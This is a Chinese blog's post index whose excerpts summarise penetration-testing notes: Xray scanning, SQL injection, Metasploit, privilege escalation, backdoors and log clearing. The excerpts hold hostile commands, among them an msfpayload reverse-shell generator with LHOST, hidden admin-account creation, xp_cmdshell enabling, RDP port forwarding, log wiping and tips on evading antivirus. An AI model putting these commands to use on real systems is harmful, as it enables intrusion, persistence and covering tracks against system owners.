自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(931)
  • 论坛 (1)
  • 收藏
  • 关注

原创 Web自动化漏洞检测工具之 Xray编写自定义格式POC

POC介绍一段漏洞证明的代码,不像exp,poc是无害的。最简单的poc由name、rules、details构成,一个poc里rules下可能有多个规则,在测试的时候会对规则进行验证,全部验证通过则表示漏洞存在,其中一个验证不通过,后面的规则也不会进行验证,此时表示漏洞不存在。一、准备工作1、在VS Code安装YAML插件:2、进入vs code的设置里找到扩展里的...

2020-05-07 11:15:11 676

原创 Xray手工测试之 :与 burpsuite联动

抓取 Xray 发包:burpsuite 作为 Xray 的上游代理一、设置burpsuite代理1、burpsuite默认代理2、在xray配置文件中添加该代理http: proxy: "http://127.0.0.1:8080" # 漏洞扫描时使用的代理二、启动xray抓包1、浏览器设置代理:127.0.0.1:77772、开启xray进行监听./...

2020-05-07 09:25:39 1240

转载 Web自动化漏洞检测工具之 Xray配置检测

Xray会生成config.yaml配置文件,我们通过配置该文件来对扫描进行状态控制。文档:https://xray.cool/xray/#/tutorial/introduce一、config.yaml的构成:1、日志输出log: level: info # 支持 debug, info, warn, error, fatal debug会输出发包取包等信息2、...

2020-05-06 22:22:27 2042

原创 Web自动化漏洞检测工具之 Xray的安装和配置

一、介绍xray不开源,利用golang开发的二进制单文件,下载地址:https://github.com/chaitin/xray/releases二、运行1、以window为例,下载到xray目录下,修改文件名为xray.exe。2、桌面搜索框输入PowerShell,选择右键WindowPowerShell找到文件位置,复制快捷方式到桌面。3、修改起始位置为xray...

2020-05-06 18:55:54 1221

转载 美团技术团队:如何防止CSRF攻击?

背景随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这需要前...

2020-05-06 11:30:33 222

原创 02、某沙龙分享的逻辑漏洞挖掘思路

sql注入漏洞cookie注入漏洞命令注入漏洞变量覆盖漏洞下载漏洞短文件漏洞文件解析漏洞文件上传漏洞文件包含漏洞fck\eweb编辑器上传漏洞xss跨站脚本攻击漏洞csrf跨站请求伪造漏洞ssrf服务端请求伪造漏洞xxe xml外部实体注入漏洞xee验证漏洞逻辑漏洞:绕过真实用户身份认证或正常业务流程达到预期的目的。用户身份特性认证本地认证服务器端认证业务流...

2020-04-30 20:20:03 156

原创 01、sql注入的一些实用方法

Oracle数据库1、在寻找注入点可以:id=1-0,这种用减号的方式来寻找。2、order by 排除法来查看表字段数。3、union联合注入 ,在语句最后加上 -- 来注释掉源码中sql语句。4、Oracle默认存在一个dual表,这个表是一行一列的,一般联合union来查询 select user from dual;联合注入用法一:?id=5-1 unionsel...

2020-04-26 11:42:19 219 1

原创 36、MetaSploit常用功能之Meterpreter

基本命令:截屏 screenshot获取系统运行的平台 sysinfo获取键盘记录keyscan_startkeyscan_dumpps查看进程migrate 1774 切换进程run post/windows/capture/keylog_recorder 记录键盘输入控制目标PC主机msfpayload windows/meterpreter...

2020-04-18 21:51:29 319

原创 35、MetaSploit常用功能之ShellCode后门

window生成shellcode:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1121 X >/root/text.exe侦听shellcode:msfuse exploit/multi/handlerset payload windows/meterpreter/reverse_...

2020-04-18 17:01:22 240

原创 34、MetaSploit常用功能之漏洞利用

漏洞利用命令一search <name> 用指定关键字搜索可利用漏洞use <exploit name> 使用漏洞show options 显示选项set <OPTION NAME> <option> 设置选项show payloads 显示装置漏洞利用命令二show targets 显示目标操作系统版本(os版...

2020-04-18 15:31:33 129

原创 33、MetaSploit常用功能之密码破解

SSH服务口令猜解use auxiliary/scanner/ssh/ssh_loginset rhosts 192.168.1.1set USERNAME rootset PASS_FILE /root/pass.txt (字典文件)set threads 50run查看漏洞利用模块并进行探测方法:show auxiliary、show exploits...

2020-04-17 23:04:19 226

原创 32、MetaSploit常用功能之信息搜集

专业术语:1、渗透攻击exploit2、攻击负载(payload):攻击者在目标上执行的一段攻击代码,该代码具有返弹连接,创建用户,执行其他系统命令的功能。3、shellcode:目标机器上运行的一段机器指令,成功执行后会返回一个shell。4、模块(module):是指MetaSploit框架中所使用的一段软件代码组件。5、监听器(listener):监听器是metasplo...

2020-04-17 22:32:11 124

原创 31、内网渗透

1、内网渗透的前提是已经拿到了web服务器。2、我们需要了解该服务器网络拓扑图和架构来进行内网渗透。3、需要进行对web服务器进行信息收集:nmap、zenmap、scanport、ntscan、arp -a、net view内网三种情况:1、有一台路由器一边连接内网一边连接外网,web服务器可能在内网的某一台,此时web服务器拥有一个内网的ip,转发到内网80端口,这样外网就可以...

2020-04-17 14:17:01 207

原创 30、后渗透手段:源码打包和脱裤

直接利用有打包的webshell即可。脱裤:数据库允许外部地址连接的,直接使用数据库管理工具连接进行转储sql即可。数据库不允许外部地址连接:1、上传脱裤脚本2、sqlmap3、burpsuite...

2020-04-17 11:40:55 360

原创 29、后渗透手段:清除痕迹

window直接运行一些程序即可。linux:进入 /boot目录查看系统版本:cat grub/grub.conf查看配置文件:ls /etc/httpd/查看源代码:ls /usr/local/usr/local、 /usr/src系统日志:tail -f /var/log/message清除日志:cat /dev/null >/var/log/mes...

2020-04-17 11:40:32 107

原创 28、后渗透手段:安装Linux通用后门

使用ssh远程软件进行连接。

2020-04-17 11:40:13 88

原创 27、后渗透手段:安装木马后门

1、上兴远程配置辅助工具利用webshell上传我们生成的文件,使用cmd运行该文件。此时本地上兴远程辅助软件就能看到并控制服务器主机了。对于此木马需要使用免杀工具进行免杀。最好用国外的壳。2、梦想时代将生成的文件拖到服务器就能成功连接到后门。...

2020-04-16 16:22:40 132

原创 26、后渗透手段:安装lpk后门

利用lpk软件生成lpk.dll文件,然后放到服务器可执行程序目录里,已执行就会生成后门。

2020-04-16 16:05:26 125

原创 25、后渗透手段:windows隐藏账号后门的创建

1、账号后门net usernet user a$ a /addnet localgroup administrator a /add打开注册表:register进行远程:

2020-04-16 14:28:42 178

原创 24、lcx内网转发、开启和嗅探3389

内网主机输入命令lcx.exe -slave 攻击者外网ip 外网端口(例如是1111) 服务器内网ip 内网端口(例如是3389)将服务器内网ip转发到攻击者外网ip。外网主机输入命令lcx.exe -listen 1111 3389 (1131端口也行,端口不能被占用)将1111转发到本地3389,此时连接本地127.0.0.1 3389就相当于连接了服务器的3389....

2020-04-16 14:05:30 108

原创 23、linux提权

uname -r 查看系统n内核版本信息找到对应内核版本的exp上传到tmp目录编译gcc xxx.c 会编译成.out文件运行./ xx.out

2020-04-16 11:27:25 66

原创 22、数据库提权:mysql提权

1、udf提权获取到对方的mysql数据库下的root账号和密码的方式:查看网站源码数据库配置文件(inc,conn,config.sql,common,data等等)查看数据库安装路径下的user.myd(/data/mysql/)暴力破解、mysql密码破解、3306端口入侵原理:通过root权限导出udf.all到系统目录下,可以通过udf.all调用执行cmdC:\...

2020-04-16 11:13:30 133

原创 21、数据库提权:sqlserver提权

1、首先需要连接到该服务器数据库2、安装cmd_shell组件:执行sql语句EXEC sp_configure 'show advanced options', 1GORECONFIGUREGOEXEC sp_configure 'xp_cmdshell', 1GORECONFIGUREGO执行dos命令查看c盘:dir c:\3、开启3389c...

2020-04-16 09:50:47 747

原创 20、第三方软件提权:搜狗输入法、pr、巴西烤肉、启动项提权

找可写目录上传pr.exe,使用cmd运行:pr.exe "net user"pr.exe "net user 【用户名】【密码】 /add"pr.exe "net user"巴西烤肉提权道理一样。

2020-04-16 09:50:20 206

原创 19、第三方软件提权:filezilla提权

filezilla是一款开源的FTP服务器和客户端的软件。若安装了服务器默认只侦听127.0.0.1的14147端口,并且默认安装目录下有两个敏感文件filezillaserver.xml(包含了用户信息)filezilla Server interface.xml(包含了管理信息)提权思路:下载这两个文件,拿到管理密码1、利用lcx.exe配置端口转发。2、登录远程管...

2020-04-15 17:52:45 104

原创 18、第三方软件提权:flashfxp提权

flashfxp会有连接历史下载quick.bat文件,覆盖本地quick.bat,这样就能进行连接了。获取网站管理密码

2020-04-15 15:38:07 123

原创 17、第三方软件提权:360本地提权

上传cmd.exe和360.execmd下运行360.exe有port权限,需要去开3389,电脑需要安装360,且该版本要有漏洞才行。cmd下运行360.exe sethc 生成后门随后连接3389,弹出输入框后,按5下shift键。如果能弹出cmd就可以创建用户提升权限了。然后登录。就当了解。...

2020-04-15 14:51:42 158

原创 16、第三方软件提权:破解hash提权

上传pwddump.exe运行获取hash值拿到lc5、彩虹表中破解得到管理员密码彩虹表下载:https://ophcrack.sourceforge.io/tables.php工具:getpass\ophcrack\QuarksPwDump

2020-04-15 14:42:00 88

原创 15、第三方软件提权:g6ftp提权

1、下载管理配置文件,将administrator管理密码破解,利用md5解密。找到g6ftp目录下的renoteadmin目录,编辑renote.ini文件,用md5解密passwordcmd5.com我们安装完g6ftp的时候先别启动,需要先结束g6ftpserver进程,随后利用工具进行破解:将该压缩包解压到g6ftp的安装目录,替换文件即可。2、使用lcx端口转发(...

2020-04-15 11:37:06 117

原创 14、第三方软件提权:vnc提权

通过读取注册表10进制数,将每个数转换为16进制。cmd来到vnc4目录:vnc4.exe -W 回车输入转换后的16进制数,每输入一个就回车一下再利用vnc viewer连接vnc...

2020-04-15 10:57:14 91

原创 13、第三方软件提权:Radmin提权

查看Radmin parameterhash值利用工具进行连接:

2020-04-15 10:44:41 74

原创 12、第三方软件提权:pcanywhere提权

访问pcanywhere默认安装目录,下载用户配置文件,通过破解账户密码文件PCA.xxx.CIF,进行提取。

2020-04-15 10:30:21 110

原创 11、第三方软件提权:Server-u 提权/asp

1、有修改权限:检查是否有可写权限,修改server-u默认安装目录下的ServUDaemon.ini,增加用户,用户密码:gw(md5(gw+密码))执行命令:quote site exec net user xx xxx /addquote site exec net localgroup administrators xx /addquote site exec net...

2020-04-15 10:16:46 106

原创 10、提权

提权就是拿到webshell之后,再进一步拿到服务器权限,控制服务器。ASP/PHP 匿名权限ASPx USER权限jsp通常是系统权限收集信息:内外网、服务器系统和版本位数、服务器的补丁情况,服务器的安装软件情况、服务器的防护软件情况、端口情况、支持脚本情况。信息收集常用命令:window:ipconfig /all 查看当前ipnet user 查看当...

2020-04-15 10:16:21 81

原创 09、普通权限拿webshell

1、0day拿webshell如果管理员密码是20位的就从中间找16位的进行解密,或者其他拼接方式。2、修改网站上传类型配置拿webshell有的网站,在网站上传类型中限制了上传脚本类型文件,我们可以去添加上传文件类型来拿webshell3、IIS写权限拿webshell现在比较少见,原理是通过找到有iis写入权限的网站,put进去一个txt的文件,目录必须有刻写的权限,如im...

2020-04-14 16:37:52 110

原创 08、管理权限拿webshell

管理权限拿webshell也就是进后台拿webshell。方法:1、正常上传,网站对文件后缀格式过滤不严格,直接上传webshell即可。上传的时候可能不过滤,但是系统防火墙可能会拦截,可以上传没有密码的webshell,可以将文件命名得和系统文件一样,来绕过管理员和系统的眼镜。2、数据库备份拿webshell网站对上传的文件后缀进行过滤,不允许上传脚本类型文件如asp/php...

2020-04-14 15:23:43 83

原创 18、短文件漏洞

利用条件:window+apache/data/backup_2ads2aad/200414_asdADSs-1.sql变为/data/backup~1/200414~1.sql

2020-04-14 13:36:16 60

原创 使用burpsuite爆破webshell密码

先抓包,发送intuder,选择poations,clear 变量,找到密码变量,给值add一个变量。在payloads里load一个字典,点击start attack。通过比较长度,来查看密码。...

2020-04-14 12:43:11 189

原创 17、变量覆盖漏洞和下载漏洞

变量如果未初始化,且能够被用户所控制,在php中,若register_globals为on时尤其严重,此时为全局变量覆盖漏洞。<?php$x="111";$y="222";echo$x;echo "<hr>";echo $y;echo "<hr>";$y=$_GET['x'];echo $y;?>下载漏洞通...

2020-04-14 09:49:00 47

原创 16、命令注入漏洞

如下php命令执行函数可以执行外部应用程序或函数:1、system 执行一个外部应用程序并现实输出结果原型:string system(String command, int &return_var)command是要执行的命令,return_var存放执行命令的执行后的状态值。<?php$cmd=$_GET["c"];echo "<pre>"...

2020-04-14 09:48:44 300

空空如也

Java剑主的留言板

发表于 2020-01-02 最后回复 2020-01-02

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除